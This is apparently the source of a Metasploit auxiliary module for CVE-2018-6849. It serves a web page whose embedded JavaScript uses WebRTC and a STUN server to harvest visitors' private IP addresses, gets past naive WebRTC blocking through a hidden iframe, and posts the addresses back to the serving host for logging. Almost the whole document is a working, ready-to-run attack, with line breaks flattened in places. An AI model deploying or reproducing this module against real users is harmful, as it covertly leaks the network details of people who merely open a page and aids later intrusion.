### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(
update_info(
info,'Name' => "Private IP Leakage to WebPage using WebRTC Function.",'Description'=> %q(
This module exploits a vulnerability in browsers using well-known property of WebRTC (Web Real-Time Communications) which enables Web applications and sites to capture or exchange arbitrary data between browsers without requiring an intermediary.),'License'=> MSF_LICENSE,'Author' => ['Brendan Coles',#MSF Module'Dhiraj Mishra'#MSF Module],'References' => [['CVE','2018-6849'],['URL','https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html']],'DisclosureDate' => 'Jan 26 2018','Actions'=> [['WebServer']],'PassiveActions' => ['WebServer'],'DefaultAction'=> 'WebServer'))end
def run
exploit # start http serverend
def setup
# code from: https://github.com/diafygi/webrtc-ips
@html = <<-JS
<script>
//get the IP addresses associated with an account
function getIPs(callback){var ip_dups = {};//compatibility for firefox and chrome
var RTCPeerConnection = window.RTCPeerConnection
|| window.mozRTCPeerConnection
|| window.webkitRTCPeerConnection;var useWebKit = !!window.webkitRTCPeerConnection;//bypass naive webrtc blocking using an iframe
if(!RTCPeerConnection){//NOTE: you need to have an iframe in the page right above the script tag
////<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
//<script>...getIPs called in here...//var win = iframe.contentWindow;
RTCPeerConnection = win.RTCPeerConnection
|| win.mozRTCPeerConnection
|| win.webkitRTCPeerConnection;
useWebKit = !!win.webkitRTCPeerConnection;}//minimal requirements fordata connection
var mediaConstraints = {
optional: [{RtpDataChannels: true}]};var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};//construct a new RTCPeerConnection
var pc = new RTCPeerConnection(servers, mediaConstraints);function handleCandidate(candidate){//match just the IP address
var ip_regex = /([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/var ip_addr = ip_regex.exec(candidate)[1];//remove duplicates
if(ip_dups[ip_addr] === undefined)
callback(ip_addr);
ip_dups[ip_addr] = true;}//listen for candidate events
pc.onicecandidate = function(ice){//skip non-candidate events
if(ice.candidate)
handleCandidate(ice.candidate.candidate);};//create a bogus data channel
pc.createDataChannel("");//create an offer sdp
pc.createOffer(function(result){//trigger the stun server request
pc.setLocalDescription(result,function(){},function(){});},function(){});//wait for a while to let everything done
setTimeout(function(){//read candidate info from local description
var lines = pc.localDescription.sdp.split('\\n');
lines.forEach(function(line){if(line.indexOf('a=candidate:') === 0)
handleCandidate(line);});}, 1000);}
getIPs(function(ip){//console.log(ip);var xmlhttp = new XMLHttpRequest;
xmlhttp.open('POST', window.location, true);
xmlhttp.send(ip);});
</script>
JS
end
def on_request_uri(cli, request)
case request.method.downcase
when 'get'
print_status("#{cli.peerhost}: Sending response (#{@html.size} bytes)")
send_response(cli, @html)
when 'post'
print_status("#{cli.peerhost}: Received reply:")
puts request.to_s
else
print_error("#{cli.peerhost}: Unhandled method: #{request.method}")endendend
